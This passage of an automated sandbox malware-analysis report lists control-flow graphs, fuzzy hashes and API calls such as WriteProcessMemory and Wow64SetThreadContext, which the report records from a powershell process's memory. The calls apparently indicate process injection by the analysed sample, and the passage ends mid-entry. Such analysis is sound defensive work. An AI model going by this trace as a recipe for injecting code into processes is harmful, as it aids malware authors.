                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1AFA789D,00000000,?,?,?,?,00000000,?,04FDC363,?,00000000,?), ref: 04FDD56C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: d2b32dfecebce40c97e1c7cf1f12e05cb4a1031d40261c066108c508ef42c0b5
                                                                                            • Instruction ID: 167711276888071adfe2a047b2ed9ca8f3b9e4d2d7cd7a21508a95af2073b725
                                                                                            • Opcode Fuzzy Hash: d2b32dfecebce40c97e1c7cf1f12e05cb4a1031d40261c066108c508ef42c0b5
                                                                                            • Instruction Fuzzy Hash: 6021E7B5901359DFDB10CF9AD884BDEBBF4FB48314F548429E918A7210D378A944CFA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 823 4fd75d4-4fdcca0 825 4fdccac-4fdccd8 Wow64SetThreadContext 823->825 826 4fdcca2-4fdccaa 823->826 827 4fdccda-4fdcce0 825->827 828 4fdcce1-4fdcd02 825->828 826->825 827->828
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,04FDC03A), ref: 04FDCCCB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 2391982c1b7601867398e6661603e9a5a35f8a68d7f265e6544b309ce3b7eba2
                                                                                            • Instruction ID: 8eddaf24da7155536d2e57cdb2d390bab908cc0977d1fb97e918fd87096aa46c
                                                                                            • Opcode Fuzzy Hash: 2391982c1b7601867398e6661603e9a5a35f8a68d7f265e6544b309ce3b7eba2
                                                                                            • Instruction Fuzzy Hash: 841114B2D006898FDB10CF9AC944BDEBBF5EB88220F188029E558A3700D379A545CFA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 816 4fd75b0-4fdcca0 818 4fdccac-4fdccd8 Wow64SetThreadContext 816->818 819 4fdcca2-4fdccaa 816->819 820 4fdccda-4fdcce0 818->820 821 4fdcce1-4fdcd02 818->821 819->818 820->821
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,04FDC03A), ref: 04FDCCCB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 63496b25b247dc3095f2c424c7184d0a7cdb84b7114afd146d6eaad7a87eed4a
                                                                                            • Instruction ID: 9a8352c5d6ac6781c783857e11eb7c3e1d5bb47059ca28b1b21389f8d4b2e444
                                                                                            • Opcode Fuzzy Hash: 63496b25b247dc3095f2c424c7184d0a7cdb84b7114afd146d6eaad7a87eed4a
                                                                                            • Instruction Fuzzy Hash: 4F1114B2D006898FDB10CF9AC944BDEBBF5EB88220F188029E558A7600D378A545CFA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 830 4fdcc58-4fdcca0 833 4fdccac-4fdccd8 Wow64SetThreadContext 830->833 834 4fdcca2-4fdccaa 830->834 835 4fdccda-4fdcce0 833->835 836 4fdcce1-4fdcd02 833->836 834->833 835->836
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,04FDC03A), ref: 04FDCCCB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783996707.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4fd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: 24c8968e55822c28df5d7e6facc6729785c13a88eded61dcdc39fe46608b5d76
                                                                                            • Instruction ID: 6c6ac499a4c9e33e25f567a24a9b1cc1c66ae91c27479751e975d5b9ffcc8260
                                                                                            • Opcode Fuzzy Hash: 24c8968e55822c28df5d7e6facc6729785c13a88eded61dcdc39fe46608b5d76
                                                                                            • Instruction Fuzzy Hash: 621114B2C006498FDB10CFAAD844B9EFBF5AB88320F588529D528A3640D378A945CF65

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1362 7dd1f18-7dd1f3a 1363 7dd20b7-7dd2102 1362->1363 1364 7dd1f40-7dd1f45 1362->1364 1370 7dd225d-7dd22a2 1363->1370 1371 7dd2108-7dd210d 1363->1371 1365 7dd1f5d-7dd1f69 1364->1365 1366 7dd1f47-7dd1f4d 1364->1366 1376 7dd1f6f-7dd1f72 1365->1376 1377 7dd2062-7dd206c 1365->1377 1367 7dd1f4f 1366->1367 1368 7dd1f51-7dd1f5b 1366->1368 1367->1365 1368->1365 1386 7dd244c-7dd247c 1370->1386 1387 7dd22a8-7dd22ad 1370->1387 1374 7dd210f-7dd2115 1371->1374 1375 7dd2125-7dd2129 1371->1375 1379 7dd2119-7dd2123 1374->1379 1380 7dd2117 1374->1380 1384 7dd212f-7dd2133 1375->1384 1385 7dd2208-7dd2212 1375->1385 1376->1377 1383 7dd1f78-7dd1f7f 1376->1383 1381 7dd206e-7dd2077 1377->1381 1382 7dd207a-7dd2080 1377->1382 1379->1375 1380->1375 1390 7dd2086-7dd2092 1382->1390 1391 7dd2082-7dd2084 1382->1391 1383->1363 1392 7dd1f85-7dd1f8a 1383->1392 1393 7dd2135-7dd2146 1384->1393 1394 7dd2173 1384->1394 1388 7dd2214-7dd221d 1385->1388 1389 7dd2220-7dd2226 1385->1389 1425 7dd247e-7dd249b 1386->1425 1426 7dd24b5-7dd24bf 1386->1426 1395 7dd22af-7dd22b5 1387->1395 1396 7dd22c5-7dd22c9 1387->1396 1397 7dd222c-7dd2238 1389->1397 1398 7dd2228-7dd222a 1389->1398 1401 7dd2094-7dd20b4 1390->1401 1391->1401 1402 7dd1f8c-7dd1f92 1392->1402 1403 7dd1fa2-7dd1fa6 1392->1403 1393->1370 1416 7dd214c-7dd2151 1393->1416 1399 7dd2175-7dd2177 1394->1399 1406 7dd22b9-7dd22c3 1395->1406 1407 7dd22b7 1395->1407 1410 7dd22cf-7dd22d3 1396->1410 1411 7dd23f4-7dd23fe 1396->1411 1409 7dd223a-7dd225a 1397->1409 1398->1409 1399->1385 1412 7dd217d-7dd2181 1399->1412 1414 7dd1f94 1402->1414 1415 7dd1f96-7dd1fa0 1402->1415 1403->1377 1405 7dd1fac-7dd1fb0 1403->1405 1423 7dd1fd0 1405->1423 1424 7dd1fb2-7dd1fce 1405->1424 1406->1396 1407->1396 1417 7dd22d5-7dd22e6 1410->1417 1418 7dd2313 1410->1418 1419 7dd240c-7dd2412 1411->1419 1420 7dd2400-7dd2409 1411->1420 1412->1385 1421 7dd2187-7dd2196 1412->1421 1414->1403 1415->1403 1428 7dd2169-7dd2171 1416->1428 1429 7dd2153-7dd2159 1416->1429 1417->1386 1452 7dd22ec-7dd22f1 1417->1452 1434 7dd2315-7dd2317 1418->1434 1431 7dd2418-7dd2424 1419->1431 1432 7dd2414-7dd2416 1419->1432 1453 7dd21ae-7dd2205 1421->1453 1454 7dd2198-7dd219e 1421->1454 1435 7dd1fd2-7dd1fd4 1423->1435 1424->1435 1457 7dd249d-7dd24af 1425->1457 1458 7dd2505-7dd250a 1425->1458 1437 7dd24c8-7dd24ce 1426->1437 1438 7dd24c1-7dd24c5 1426->1438 1428->1399 1441 7dd215d-7dd2167 1429->1441 1442 7dd215b 1429->1442 1445 7dd2426-7dd2449 1431->1445 1432->1445 1434->1411 1447 7dd231d-7dd2321 1434->1447 1435->1377 1450 7dd1fda-7dd1fe7 1435->1450 1439 7dd24d4-7dd24e0 1437->1439 1440 7dd24d0-7dd24d2 1437->1440 1451 7dd24e2-7dd2502 1439->1451 1440->1451 1441->1428 1442->1428 1447->1411 1456 7dd2327-7dd232b 1447->1456 1475 7dd1fee-7dd1ff0 1450->1475 1462 7dd2309-7dd2311 1452->1462 1463 7dd22f3-7dd22f9 1452->1463 1464 7dd21a0 1454->1464 1465 7dd21a2-7dd21a4 1454->1465 1456->1411 1468 7dd2331-7dd2357 1456->1468 1457->1426 1458->1457 1462->1434 1473 7dd22fd-7dd2307 1463->1473 1474 7dd22fb 1463->1474 1464->1453 1465->1453 1468->1411 1486 7dd235d-7dd2361 1468->1486 1473->1462 1474->1462 1478 7dd2008-7dd205f 1475->1478 1479 7dd1ff2-7dd1ff8 1475->1479 1482 7dd1ffc-7dd1ffe 1479->1482 1483 7dd1ffa 1479->1483 1482->1478 1483->1478 1487 7dd2384 1486->1487 1488 7dd2363-7dd236c 1486->1488 1491 7dd2387-7dd2394 1487->1491 1489 7dd236e-7dd2371 1488->1489 1490 7dd2373-7dd2380 1488->1490 1492 7dd2382 1489->1492 1490->1492 1494 7dd239a-7dd23f1 1491->1494 1492->1491
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6f3d86e5854b80e5dddbb0338113e61748bd9540b28d57c4ea5503374d4fae40
                                                                                            • Instruction ID: 7d59bf83d73475f55e77c0452ddf6b32224db52397dbeb7ee53f99e0d0ded6c4
                                                                                            • Opcode Fuzzy Hash: 6f3d86e5854b80e5dddbb0338113e61748bd9540b28d57c4ea5503374d4fae40
                                                                                            • Instruction Fuzzy Hash: E5F136B1B0430ADFDB299F68D8047AAFBA2FF85311F14C06AE5558B251DB31EC85C7A1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1496 7dd09c8-7dd09eb 1497 7dd0bc6-7dd0bde 1496->1497 1498 7dd09f1-7dd09f6 1496->1498 1506 7dd0be0 1497->1506 1507 7dd0be3-7dd0c0e 1497->1507 1499 7dd0a0e-7dd0a12 1498->1499 1500 7dd09f8-7dd09fe 1498->1500 1504 7dd0a18-7dd0a1c 1499->1504 1505 7dd0b73-7dd0b7d 1499->1505 1502 7dd0a00 1500->1502 1503 7dd0a02-7dd0a0c 1500->1503 1502->1499 1503->1499 1510 7dd0a2f 1504->1510 1511 7dd0a1e-7dd0a2d 1504->1511 1508 7dd0b7f-7dd0b88 1505->1508 1509 7dd0b8b-7dd0b91 1505->1509 1506->1507 1512 7dd0d7b-7dd0dad 1507->1512 1513 7dd0c14-7dd0c19 1507->1513 1515 7dd0b97-7dd0ba3 1509->1515 1516 7dd0b93-7dd0b95 1509->1516 1517 7dd0a31-7dd0a33 1510->1517 1511->1517 1548 7dd0dbd 1512->1548 1549 7dd0daf-7dd0dbb 1512->1549 1518 7dd0c1b-7dd0c21 1513->1518 1519 7dd0c31-7dd0c35 1513->1519 1520 7dd0ba5-7dd0bc3 1515->1520 1516->1520 1517->1505 1521 7dd0a39-7dd0a59 1517->1521 1523 7dd0c25-7dd0c2f 1518->1523 1524 7dd0c23 1518->1524 1526 7dd0c3b-7dd0c3d 1519->1526 1527 7dd0d2a-7dd0d34 1519->1527 1544 7dd0a78 1521->1544 1545 7dd0a5b-7dd0a76 1521->1545 1523->1519 1524->1519 1528 7dd0c4d 1526->1528 1529 7dd0c3f-7dd0c4b 1526->1529 1532 7dd0d36-7dd0d3f 1527->1532 1533 7dd0d42-7dd0d48 1527->1533 1535 7dd0c4f-7dd0c51 1528->1535 1529->1535 1536 7dd0d4e-7dd0d5a 1533->1536 1537 7dd0d4a-7dd0d4c 1533->1537 1535->1527 1541 7dd0c57-7dd0c59 1535->1541 1543 7dd0d5c-7dd0d78 1536->1543 1537->1543 1546 7dd0c69 1541->1546 1547 7dd0c5b-7dd0c67 1541->1547 1553 7dd0a7a-7dd0a7c 1544->1553 1545->1553 1552 7dd0c6b-7dd0c6d 1546->1552 1547->1552 1554 7dd0dbf-7dd0dc1 1548->1554 1549->1554 1552->1527 1556 7dd0c73-7dd0c75 1552->1556 1553->1505 1557 7dd0a82-7dd0a84 1553->1557 1558 7dd0e0d-7dd0e17 1554->1558 1559 7dd0dc3-7dd0dc9 1554->1559 1563 7dd0c8f-7dd0c93 1556->1563 1564 7dd0c77-7dd0c7d 1556->1564 1565 7dd0a94 1557->1565 1566 7dd0a86-7dd0a92 1557->1566 1561 7dd0e19-7dd0e1f 1558->1561 1562 7dd0e22-7dd0e28 1558->1562 1567 7dd0dcb-7dd0dcd 1559->1567 1568 7dd0dd7-7dd0df4 1559->1568 1570 7dd0e2e-7dd0e3a 1562->1570 1571 7dd0e2a-7dd0e2c 1562->1571 1575 7dd0cad-7dd0d27 1563->1575 1576 7dd0c95-7dd0c9b 1563->1576 1572 7dd0c7f 1564->1572 1573 7dd0c81-7dd0c8d 1564->1573 1574 7dd0a96-7dd0a98 1565->1574 1566->1574 1567->1568 1582 7dd0e5a-7dd0e5f 1568->1582 1583 7dd0df6-7dd0e07 1568->1583 1578 7dd0e3c-7dd0e57 1570->1578 1571->1578 1572->1563 1573->1563 1574->1505 1579 7dd0a9e-7dd0abe 1574->1579 1580 7dd0c9d 1576->1580 1581 7dd0c9f-7dd0cab 1576->1581 1595 7dd0ad6-7dd0ada 1579->1595 1596 7dd0ac0-7dd0ac6 1579->1596 1580->1575 1581->1575 1582->1583 1583->1558 1599 7dd0adc-7dd0ae2 1595->1599 1600 7dd0af4-7dd0af8 1595->1600 1597 7dd0ac8 1596->1597 1598 7dd0aca-7dd0acc 1596->1598 1597->1595 1598->1595 1601 7dd0ae4 1599->1601 1602 7dd0ae6-7dd0af2 1599->1602 1603 7dd0aff-7dd0b01 1600->1603 1601->1600 1602->1600 1604 7dd0b19-7dd0b70 1603->1604 1605 7dd0b03-7dd0b09 1603->1605 1607 7dd0b0d-7dd0b0f 1605->1607 1608 7dd0b0b 1605->1608 1607->1604 1608->1604
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cfe0575c637c7a021a833b14eafaa50a67a5a80e3f509be454e5070a0cb9ee99
                                                                                            • Instruction ID: 8fbf590d8ea8c6a46c41399d8e9cef6823db32d0be4cc1e178c9c3e704e010df
                                                                                            • Opcode Fuzzy Hash: cfe0575c637c7a021a833b14eafaa50a67a5a80e3f509be454e5070a0cb9ee99
                                                                                            • Instruction Fuzzy Hash: F1B15AB170430A9FDB249B7998107BAFBA5AFC5611F28807BD845DB281EF31DD41C7A1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1610 7dd13a0-7dd13c6 1611 7dd13cc-7dd13d1 1610->1611 1612 7dd1572-7dd15ba 1610->1612 1613 7dd13e9-7dd13ed 1611->1613 1614 7dd13d3-7dd13d9 1611->1614 1620 7dd16ec-7dd171d 1612->1620 1621 7dd15c0-7dd15c5 1612->1621 1618 7dd151e-7dd1528 1613->1618 1619 7dd13f3-7dd13f5 1613->1619 1616 7dd13dd-7dd13e7 1614->1616 1617 7dd13db 1614->1617 1616->1613 1617->1613 1622 7dd152a-7dd1533 1618->1622 1623 7dd1536-7dd153c 1618->1623 1624 7dd1405 1619->1624 1625 7dd13f7-7dd1403 1619->1625 1641 7dd172d 1620->1641 1642 7dd171f-7dd172b 1620->1642 1629 7dd15dd-7dd15e1 1621->1629 1630 7dd15c7-7dd15cd 1621->1630 1627 7dd153e-7dd1540 1623->1627 1628 7dd1542-7dd154e 1623->1628 1631 7dd1407-7dd1409 1624->1631 1625->1631 1633 7dd1550-7dd156f 1627->1633 1628->1633 1636 7dd169e-7dd16a8 1629->1636 1637 7dd15e7-7dd15e9 1629->1637 1634 7dd15cf 1630->1634 1635 7dd15d1-7dd15db 1630->1635 1631->1618 1638 7dd140f-7dd1413 1631->1638 1634->1629 1635->1629 1643 7dd16aa-7dd16b2 1636->1643 1644 7dd16b5-7dd16bb 1636->1644 1646 7dd15f9 1637->1646 1647 7dd15eb-7dd15f7 1637->1647 1639 7dd1415-7dd1424 1638->1639 1640 7dd1426 1638->1640 1648 7dd1428-7dd142a 1639->1648 1640->1648 1650 7dd172f-7dd1731 1641->1650 1642->1650 1651 7dd16bd-7dd16bf 1644->1651 1652 7dd16c1-7dd16cd 1644->1652 1653 7dd15fb-7dd15fd 1646->1653 1647->1653 1648->1618 1655 7dd1430-7dd1432 1648->1655 1656 7dd179f-7dd17a9 1650->1656 1657 7dd1733-7dd1752 1650->1657 1658 7dd16cf-7dd16e9 1651->1658 1652->1658 1653->1636 1659 7dd1603-7dd1605 1653->1659 1662 7dd1434-7dd1440 1655->1662 1663 7dd1442 1655->1663 1664 7dd17ab-7dd17af 1656->1664 1665 7dd17b2-7dd17b8 1656->1665 1694 7dd1754-7dd1760 1657->1694 1695 7dd1762 1657->1695 1660 7dd161f-7dd162a 1659->1660 1661 7dd1607-7dd160d 1659->1661 1680 7dd162c-7dd1632 1660->1680 1681 7dd1642-7dd169b 1660->1681 1669 7dd160f 1661->1669 1670 7dd1611-7dd161d 1661->1670 1671 7dd1444-7dd1446 1662->1671 1663->1671 1672 7dd17be-7dd17ca 1665->1672 1673 7dd17ba-7dd17bc 1665->1673 1669->1660 1670->1660 1671->1618 1676 7dd144c-7dd144e 1671->1676 1677 7dd17cc-7dd17ea 1672->1677 1673->1677 1682 7dd1468-7dd1473 1676->1682 1683 7dd1450-7dd1456 1676->1683 1687 7dd1634 1680->1687 1688 7dd1636-7dd1638 1680->1688 1692 7dd1475-7dd1478 1682->1692 1693 7dd1482-7dd148e 1682->1693 1689 7dd1458 1683->1689 1690 7dd145a-7dd1466 1683->1690 1687->1681 1688->1681 1689->1682 1690->1682 1692->1693 1697 7dd149c-7dd14a3 1693->1697 1698 7dd1490-7dd1492 1693->1698 1696 7dd1764-7dd1766 1694->1696 1695->1696 1696->1656 1699 7dd1768-7dd1785 1696->1699 1702 7dd14aa-7dd14ac 1697->1702 1698->1697 1709 7dd17ed-7dd17f2 1699->1709 1710 7dd1787-7dd1799 1699->1710 1703 7dd14ae-7dd14b4 1702->1703 1704 7dd14c4-7dd151b 1702->1704 1706 7dd14b8-7dd14ba 1703->1706 1707 7dd14b6 1703->1707 1706->1704 1707->1704 1709->1710 1710->1656
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b6f9d110862bfb42f58a83fdb42402d03da561a3bddb3080fcad361e4181b19e
                                                                                            • Instruction ID: 4929fd5e52a63e06adcc312cd01d85dbd9c8aa7c398513ec0a6f263c687f2a25
                                                                                            • Opcode Fuzzy Hash: b6f9d110862bfb42f58a83fdb42402d03da561a3bddb3080fcad361e4181b19e
                                                                                            • Instruction Fuzzy Hash: 16B109B170431EDFCB255E69D4007AAFBA6EF85211F2A806AD846CB251EB36CD41C761

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1712 7dd00f0-7dd0115 1713 7dd028d-7dd02a5 1712->1713 1714 7dd011a-7dd0120 1712->1714 1720 7dd026a 1713->1720 1721 7dd02a7-7dd02d3 1713->1721 1715 7dd0138-7dd0144 1714->1715 1716 7dd0122-7dd0128 1714->1716 1726 7dd023a-7dd0244 1715->1726 1727 7dd014a-7dd014d 1715->1727 1718 7dd012c-7dd0136 1716->1718 1719 7dd012a 1716->1719 1718->1715 1719->1715 1728 7dd026c-7dd028a 1720->1728 1723 7dd02d9-7dd02de 1721->1723 1724 7dd042a-7dd045d 1721->1724 1729 7dd02f6-7dd02fa 1723->1729 1730 7dd02e0-7dd02e6 1723->1730 1749 7dd045f-7dd047c 1724->1749 1750 7dd04be-7dd04c8 1724->1750 1731 7dd0246-7dd024f 1726->1731 1732 7dd0252-7dd0258 1726->1732 1727->1726 1733 7dd0153-7dd015a 1727->1733 1738 7dd03d7-7dd03e1 1729->1738 1739 7dd0300-7dd0302 1729->1739 1734 7dd02e8 1730->1734 1735 7dd02ea-7dd02f4 1730->1735 1736 7dd025e-7dd0260 1732->1736 1737 7dd025a-7dd025c 1732->1737 1733->1713 1740 7dd0160-7dd0165 1733->1740 1734->1729 1735->1729 1736->1720 1737->1728 1743 7dd03ef-7dd03f5 1738->1743 1744 7dd03e3-7dd03ec 1738->1744 1745 7dd0304-7dd0310 1739->1745 1746 7dd0312 1739->1746 1747 7dd017d-7dd0181 1740->1747 1748 7dd0167-7dd016d 1740->1748 1753 7dd03fb-7dd0407 1743->1753 1754 7dd03f7-7dd03f9 1743->1754 1756 7dd0314-7dd0316 1745->1756 1746->1756 1747->1726 1759 7dd0187-7dd0189 1747->1759 1757 7dd016f 1748->1757 1758 7dd0171-7dd017b 1748->1758 1771 7dd050d-7dd0512 1749->1771 1772 7dd0482-7dd0488 1749->1772 1751 7dd04ca-7dd04ce 1750->1751 1752 7dd04d1-7dd04d7 1750->1752 1763 7dd04dd-7dd04e9 1752->1763 1764 7dd04d9-7dd04db 1752->1764 1761 7dd0409-7dd0427 1753->1761 1754->1761 1756->1738 1765 7dd031c-7dd0320 1756->1765 1757->1747 1758->1747 1766 7dd0199 1759->1766 1767 7dd018b-7dd0197 1759->1767 1773 7dd04eb-7dd050a 1763->1773 1764->1773 1774 7dd0340 1765->1774 1775 7dd0322-7dd033e 1765->1775 1770 7dd019b-7dd019d 1766->1770 1767->1770 1770->1726 1776 7dd01a3-7dd01a5 1770->1776 1771->1772 1780 7dd048c-7dd0498 1772->1780 1781 7dd048a 1772->1781 1778 7dd0342-7dd0344 1774->1778 1775->1778 1783 7dd01bf-7dd01c8 1776->1783 1784 7dd01a7-7dd01ad 1776->1784 1778->1738 1786 7dd034a-7dd035d 1778->1786 1788 7dd049a-7dd04b8 1780->1788 1781->1788 1798 7dd01ca-7dd01d0 1783->1798 1799 7dd01e0-7dd0237 1783->1799 1789 7dd01af 1784->1789 1790 7dd01b1-7dd01bd 1784->1790 1804 7dd0363-7dd0365 1786->1804 1788->1750 1789->1783 1790->1783 1801 7dd01d4-7dd01d6 1798->1801 1802 7dd01d2 1798->1802 1801->1799 1802->1799 1805 7dd037d-7dd03d4 1804->1805 1806 7dd0367-7dd036d 1804->1806 1807 7dd036f 1806->1807 1808 7dd0371-7dd0373 1806->1808 1807->1805 1808->1805
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2d11aa1517a25d044de6af7b927d6b16258296e63075b933454d5fa08a5e23a7
                                                                                            • Instruction ID: 3963ddb1657bdde9d830ff39011faf959efdd7a08769eaaba32eba144c5cf3b8
                                                                                            • Opcode Fuzzy Hash: 2d11aa1517a25d044de6af7b927d6b16258296e63075b933454d5fa08a5e23a7
                                                                                            • Instruction Fuzzy Hash: 16B116B1B04306DFDB259B69D8407AAFBA6AFC6210F24C07BD545DB241EB71CD82C7A1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 685d4e52d3550ab2f33ada951444d6dbbb31b83c418625da39b73e0cede690b8
                                                                                            • Instruction ID: 6343682f28433d5e52c62e579af8e13988932f5b23e226e186fe980763d3ef12
                                                                                            • Opcode Fuzzy Hash: 685d4e52d3550ab2f33ada951444d6dbbb31b83c418625da39b73e0cede690b8
                                                                                            • Instruction Fuzzy Hash: DC31F8F06083069FDB249E24CA1077AFBA1AFC1254F2690A7D804DF291EB75CD81C7B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7882fe731f54be5fc7aced9e0d39595408a06be2800216cd3ce5e56dc9bfbbef
                                                                                            • Instruction ID: ddaafdccbed44f092dd87e144b992a98ec063f9a3bd497afd2e22cd40b39c223
                                                                                            • Opcode Fuzzy Hash: 7882fe731f54be5fc7aced9e0d39595408a06be2800216cd3ce5e56dc9bfbbef
                                                                                            • Instruction Fuzzy Hash: 453147F1A04349CFDB149F31C4406B5FBB1FF52221F0680A6D4888B152D732DC86C791
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 528180e908d51821a1ecba97155a2e0fa24398be55d4c29e0d54e5a5230fbcf2
                                                                                            • Instruction ID: 989b3f599df6f5bc85dc7620ae837e1645751f0a38acffcbdaa876daf8ec79a6
                                                                                            • Opcode Fuzzy Hash: 528180e908d51821a1ecba97155a2e0fa24398be55d4c29e0d54e5a5230fbcf2
                                                                                            • Instruction Fuzzy Hash: 1D3101B160830EDFCB298E19C6446A5FBB5EF42211F2B81A6DC44DB252E737CD85CB61
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1821915091.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_7dd0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ef993ecea50085d0c6a0776d706d4e12189968fef80ea1bcccf19272b1704381
                                                                                            • Instruction ID: 5b7ca19daeebd64c47476bdd83ffc867c478a9f14cc70259b6e214dd15ab2447
                                                                                            • Opcode Fuzzy Hash: ef993ecea50085d0c6a0776d706d4e12189968fef80ea1bcccf19272b1704381
                                                                                            • Instruction Fuzzy Hash: 270192A150E7C05FE713133498692A17F749F97215B6B04C7C8C0CF1E3D92A4D4ACBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783152106.0000000004E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4e3d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5849d1f40dca42dece2113b6648eb68b5eb6ded5ee6e83d0fc7dd44d96a29f2f
                                                                                            • Instruction ID: fd67e8553bd17679c84f7f3cac9bac394a671dcc4e95265134cf57bc409ceba1
                                                                                            • Opcode Fuzzy Hash: 5849d1f40dca42dece2113b6648eb68b5eb6ded5ee6e83d0fc7dd44d96a29f2f
                                                                                            • Instruction Fuzzy Hash: 3A01526200E7C09FD7138B259C94B52BFB4DF43624F1D80DBD8988F293C2695849CB72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1783152106.0000000004E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E3D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_4e3d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
